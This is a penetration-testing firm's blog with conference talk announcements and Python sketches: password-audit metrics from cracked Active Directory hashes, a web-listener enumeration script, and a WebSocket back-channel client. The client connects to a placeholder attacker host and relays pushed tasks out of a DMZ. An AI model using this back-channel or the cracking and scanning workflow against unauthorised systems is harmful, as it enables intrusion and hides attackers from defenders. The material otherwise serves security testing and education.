Wednesday, February 12, 2014

Matt Wood & Nick Popovich at BSides Tampa

Sunera's penetration testing team members Matt Wood and Nick Popovich will both be presenting at this week's BSides Tampa security conference!

Nick Popovich is a Senior Consultant on the A&P team, and recently presented at the ShmooCon conference. His talk, Enterprise Active Directory Password Auditing, will be at 2:30 PM in Track 2. Here is the summary:

Most organizations enforce some form of password complexity requirements for their Active Directory (AD) users. These requirements may be mandated by a compliance framework, or the organization may simply be following industry best practice. However, as security consultants, we have observed that few organizations take the time to audit their Active Directory passwords, and they are therefore unaware whether their password policy is being enforced or needs enhancement. This talk will detail the process and steps necessary to audit AD passwords using publicly available tools, and will provide metrics that can be used to identify common weaknesses in passwords.
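The talk's own tooling and data aren't reproduced here, but as a rough illustration of the metrics step the abstract describes, the sketch below tallies some simple statistics from an AD hash export and a list of cracked passwords. The file names and formats are assumptions (a secretsdump-style "user:rid:lmhash:nthash:::" export and a hashcat-style "nthash:plaintext" potfile), not necessarily what the talk uses:

```python
# Hypothetical sketch: basic password-audit metrics from an AD hash export
# and a cracked-password list. File names and formats are assumptions, not
# the tooling from the talk.
from collections import Counter

def load_hashes(ntds_file):
    """Map NT hash -> list of accounts using it (secretsdump-style lines)."""
    accounts = {}
    with open(ntds_file) as f:
        for line in f:
            parts = line.strip().split(":")
            if len(parts) < 4:
                continue
            user, nthash = parts[0], parts[3].lower()
            accounts.setdefault(nthash, []).append(user)
    return accounts

def load_cracked(potfile):
    """Map NT hash -> cracked plaintext (hashcat-style "hash:plain" lines)."""
    cracked = {}
    with open(potfile) as f:
        for line in f:
            if ":" in line:
                nthash, plain = line.rstrip("\n").split(":", 1)
                cracked[nthash.lower()] = plain
    return cracked

def report(ntds_file="ntds_export.txt", potfile="cracked.pot"):  # hypothetical names
    accounts = load_hashes(ntds_file)
    cracked = load_cracked(potfile)
    total = sum(len(users) for users in accounts.values())
    cracked_accounts = [u for h, users in accounts.items() if h in cracked for u in users]
    shared = [users for users in accounts.values() if len(users) > 1]

    print("Total accounts:          %d" % total)
    print("Cracked accounts:        %d (%.1f%%)"
          % (len(cracked_accounts), 100.0 * len(cracked_accounts) / max(total, 1)))
    print("Shared-password groups:  %d" % len(shared))
    lengths = Counter(len(cracked[h]) for h in accounts if h in cracked)
    for length, count in sorted(lengths.items()):
        print("  %2d-character passwords: %d unique" % (length, count))

if __name__ == "__main__":
    report()
```

Even basic numbers like these (crack rate, password reuse, length distribution) are usually enough to show whether the written policy matches what users actually do.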

Matt Wood is a Manager on the A&P team, and is a veteran presenter from conferences such as BlackHat, Source, RSA, and OWASP. His presentation, What's lurking inside the "Real-Time Web"?, will be in Track 2 at 4:30 PM. The talk summary is below:

Increasingly "real-time" web applications are utilizing new protocols implemented by HTTP clients and servers such as WebSockets and SPDY. This presentation will demonstrate how these new functionalities permit attackers to more effectively, and more stealthily establish bidirectional communication with compromised hosts and in the process bypass outbound connection restrictions. We will cover the theory, historical techniques, defensive methodologies and new techniques throughout the presentation.

At the heart of these techniques is the ability to establish bidirectional communication channels on top of HTTP connections, which is in stark contrast to the original intent of HTTP. These new channels defeat even the best DMZ traffic policies, which generally disallow all outbound connectivity from the DMZ and allow only certain ports (80, 443) inbound. Attackers have known for many years how to abuse the trusted relationship between web servers (or any exposed service!) and perimeter firewalls (inbound ports). Generally, these tricks come at a price: due to the way these applications functioned, they could be detected by a vigilant security team.

We will discuss how attackers can easily bypass outbound firewall rules, the history of these methodologies, and common defensive techniques for combating this threat. Furthermore, new techniques will be described that utilize "real-time" protocols; specifically, how these techniques can create back-channels that hide from those vigilant security teams, increase the throughput and reliability of an attacker's "VPN", and arbitrarily direct traffic from the Internet into a DMZ environment.
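The presentation's tooling isn't included in this post, but the core idea is straightforward: a host inside the DMZ makes a single outbound connection to TCP/443 that upgrades to a WebSocket, after which either end can send data at any time over what looks, at the firewall, like an ordinary long-lived HTTPS session. A minimal client-side sketch, assuming the third-party Python "websockets" library and a hypothetical endpoint, could look like this:

```python
# Minimal sketch of a WebSocket back-channel (client side). Assumes the
# third-party "websockets" library (pip install websockets); the endpoint
# URL is hypothetical, and this is not the tooling from the presentation.
import asyncio
import websockets

async def back_channel():
    # One outbound connection to TCP/443 that upgrades to a WebSocket.
    # Once established, either side can send at any time; the remote end
    # never needs an inbound connection to reach this host.
    uri = "wss://attacker.example.com/updates"   # hypothetical endpoint
    async with websockets.connect(uri) as ws:
        await ws.send("hello from inside the DMZ")
        while True:
            task = await ws.recv()                    # server pushes a "task"
            await ws.send("result for: " + str(task)) # reply on the same socket

if __name__ == "__main__":
    asyncio.run(back_channel())
```

Because the connection originates from inside the DMZ on an allowed port, a typical egress policy never sees an inbound connection to block.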

Thursday, January 16, 2014

Sunera's Nick Popovich Speaking at ShmooCon 2014

Nick Popovich, senior consultant on the Sunera Attack & Penetration team, will be speaking at this week's ShmooCon 2014 conference.

Nick will be speaking about a recent research project that brought to light an information exposure vulnerability in a major US-based ISP. What began as simple curiosity about the inner workings of an application led to the ability to list wireless network names and wireless encryption keys (among other things), armed only with a WAN IP address.

His research also shows that coordinated disclosure can go right.

Nick will be in the "Bring it On!" track on Saturday at 11 AM.

For the full abstract or more information, please see the link below, and look here for more information following the conference.

http://www.shmoocon.org/speakers#soapyservice

Friday, July 19, 2013

Enumerating web services with classify.webbies.py

classify.webbies.py is a Python script that captures and presents a high-level overview of all the web listeners within a defined scope, allowing the user to spot the more interesting web targets efficiently and with relative ease, regardless of the number of discovered web services. The script enumerates each web listener to determine whether the service is using SSL, the banner of the web service, the title of the web application, and whether the application has any interactive components such as forms and logins. Lastly, the script can also take a screenshot of the web application.

Throughout our engagements, we have often used Nessus or nmap to scan targets for open ports and the services possibly listening on those ports. However, with regard to web services, Nessus does not indicate whether the service is HTTP or HTTPS, and neither tool gives much information about the web applications that may be running on the discovered ports. When confronted with thousands of web listeners, manually inspecting each service can be a soul-draining task. I find it especially frustrating when the bulk of the web listeners merely redirect to either a previously inspected host or a site that is out of scope.

To automate the task of inspecting the discovered web listeners, I put together a Python script to classify them. At the time of writing, the accepted input types are Nessus nbe files, nmap gnmap files, or text files containing a list of hosts and ports in "host:port" format. With this input, the script will attempt to connect to each of the web listeners and determine several details:
  • HTTP or HTTPS
  • the web service banner
  • whether form elements are present
  • whether a login is present
The results are printed in CSV form for easy grep-fu and import into other tools.
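The script itself is linked below; as a rough idea of what the per-listener classification involves, here is a stripped-down sketch using the requests library (an assumption for illustration, not necessarily how classify.webbies.py is implemented):

```python
# Stripped-down sketch of classifying one "host:port" web listener.
# Uses the "requests" library as an assumption; the real classify.webbies.py
# may implement this differently.
import csv
import re
import sys

import requests
import urllib3

urllib3.disable_warnings()  # scanning often hits self-signed certificates

def classify(host, port, timeout=5):
    for scheme in ("https", "http"):          # try SSL first, then plain HTTP
        url = "%s://%s:%s/" % (scheme, host, port)
        try:
            resp = requests.get(url, timeout=timeout, verify=False)
        except requests.RequestException:
            continue
        body = resp.text
        title = re.search(r"<title[^>]*>(.*?)</title>", body, re.I | re.S)
        return {
            "host": host,
            "port": port,
            "scheme": scheme,
            "banner": resp.headers.get("Server", ""),
            "title": title.group(1).strip() if title else "",
            "forms": "yes" if re.search(r"<form\b", body, re.I) else "no",
            "login": "yes" if re.search(r'type=["\']?password', body, re.I) else "no",
        }
    return None

if __name__ == "__main__":
    fields = ["host", "port", "scheme", "banner", "title", "forms", "login"]
    writer = csv.writer(sys.stdout)
    writer.writerow(fields)
    for line in sys.stdin:                    # expects "host:port" lines
        host, _, port = line.strip().rpartition(":")
        result = classify(host, port)
        if result:
            writer.writerow([result[k] for k in fields])
```

Feeding it "host:port" lines on stdin produces CSV output similar in spirit to the script's.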

When enumerating a web service, the script will follow a predetermined number of redirects as long as the redirection stays within the defined scope. Additionally, the script is threaded, which makes classification extremely fast, and it can work through proxychains. To top it off, it has a screen capture option that will render a PNG screenshot of each web application that responded with a 200 HTTP status code. Unfortunately, the screen capture feature is not threaded and will take some time to complete. The original screen capture class was written by plumo and can be found here: http://webscraping.com/blog/Webpage-screenshots-with-webkit/. I have modified this version by adding a spoofed user agent and disabling JavaScript.
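As an illustration of the two behaviors just described, scoped redirect following and threading, a sketch along these lines could look like the following; again, this is not the script's actual implementation:

```python
# Illustrative sketch only: follow a bounded number of redirects while they
# stay in scope, and run the per-listener checks concurrently.
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import urljoin, urlparse

import requests
import urllib3

urllib3.disable_warnings()
MAX_REDIRECTS = 3

def fetch_in_scope(url, in_scope_hosts, timeout=5):
    """Follow a bounded number of redirects, stopping if they leave scope."""
    resp = None
    for _ in range(MAX_REDIRECTS + 1):
        resp = requests.get(url, timeout=timeout, verify=False,
                            allow_redirects=False)
        if resp.status_code not in (301, 302, 303, 307, 308):
            break
        target = urljoin(url, resp.headers.get("Location", ""))
        if urlparse(target).hostname not in in_scope_hosts:
            break                    # redirect leaves the defined scope
        url = target
    return resp

def classify_all(urls, in_scope_hosts, workers=20):
    """Run the per-listener checks concurrently so large scopes finish quickly."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return list(pool.map(lambda u: fetch_in_scope(u, in_scope_hosts), urls))
```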

We have found this Python script to be useful and hope the community does as well.

The script can be downloaded from here:
https://sunera-ap-team.googlecode.com/git/classify_webbies/classify.webbies.py

Version 3.1 Change notes:

  • Removed Qt; it was too buggy and unreliable for our purposes. PhantomJS is now used instead.
  • Added -A, which analyzes the webbies and groups them according to similarity. This option generates graphs as .ps files that can later be converted to JPG, PNG, etc.
  • Pickle files of the webbies are now generated when the debug flag or analyze option is given. These can be reloaded into ClassifyWebbies.py using the -P option so that hosts can be reanalyzed or re-screenshotted without crawling.
  • Fixed a ton of random bugs.